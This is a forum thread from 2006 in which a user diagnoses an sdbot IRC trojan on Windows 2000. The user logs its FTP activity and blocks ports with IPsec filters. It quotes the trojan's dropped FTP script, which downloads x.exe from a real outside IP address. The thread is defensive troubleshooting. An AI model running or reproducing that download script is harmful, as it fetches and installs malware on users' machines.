Welcome to WebmasterWorld Guest from 54.226.246.160

Forum Moderators: bill

Message Too Old, No Replies

How to Block IRC on Windows 2000?

Is there a way to turn off/ prohibit IRC on windows?

     

lmo4103

2:26 am on Oct 11, 2006 (gmt 0)

5+ Year Member



Trojan irc.sdbot2 keeps planting files x.exe. i, a in system32
Grissoft keeps catching it.

I open the file i in system32 with notepad and it has:
open 218.63.173.251 6497
user 1 1
get x.exe
quit

This on a fresh installation of windows 2000.
I have internet explorer security setting as high as it will go.
I am on the internet as a restricted user.
Even if I am not topuching the pc, after a while it pops up again.

I just want to block unwanted files being deposited on my computer.

lmo4103

1:47 am on Oct 16, 2006 (gmt 0)

5+ Year Member



Throughout this thread, the "File and Printer Sharing for Microsoft Networks" has been un-checked for the dial-up connection, and there has not been any other network connection (net cable unplugged).

lmo4103

1:58 am on Oct 16, 2006 (gmt 0)

5+ Year Member



Deleted %windir%\system32\dllcache\ftp.exe
Renamed %windir%\system32\ftp.exe TO %windir%\system32\ftp_bak.exe
Created %windir%\system32\ftp.bat

.........................
%windir%\system32\ftp.bat
.........................
@echo off
echo %date:~4,10% %time:~0,8% %0 %1 %2 %3 %4 %5 %6 %7 %8 %9 >> c:\foo.log

............
c:\foo.log
............
10/15/2006 1:09:29 ftp -n -s:i
10/15/2006 1:16:32 ftp -n -s:i
10/15/2006 1:30:58 ftp -n -s:i
10/15/2006 11:29:53 ftp -n -s:o
10/15/2006 11:32:55 ftp -n -s:o
10/15/2006 11:33:17 ftp -n -s:i
10/15/2006 11:33:42 ftp -n -s:o
10/15/2006 11:35:07 ftp -n -s:i
10/15/2006 17:11:16 ftp -n -s:i
10/15/2006 17:23:37 ftp -n -s:i
10/15/2006 21:48:45 ftp -n -s:i

...........
windump has
...........
21:48:28.387824 IP 221.208.208.90.32846 > walterh2.1027: UDP, length 459
21:48:28.387824 IP walterh2 > 221.208.208.90: ICMP walterh2 udp port 1027 unreachable, length 36

%windir%\system32\i appeared at 21:48:45

WHOIS Record For
221.208.208.90
Record Type: IP Address

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

WHOIS Record For
218.63.173.251
Record Type: IP Address

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

lmo4103

10:33 pm on Oct 17, 2006 (gmt 0)

5+ Year Member



blocking, you can't do it from windows alone. You need a separate program that monitors and blocks internet traffic by blocking specific ports

Control Panel -> Administrative Tools -> Local Security Policy -> IP Security Policies on Local Machine
.. Manage IP Filter Lists
.. Create IP Security Policy
.... Block inbound UDP 1025,1026,1027 and TCP 1025,445,135

Have not seen that sdbot for a while...

This 33 message thread spans 2 pages: 33
 

Featured Threads

Hot Threads This Week

Hot Threads This Month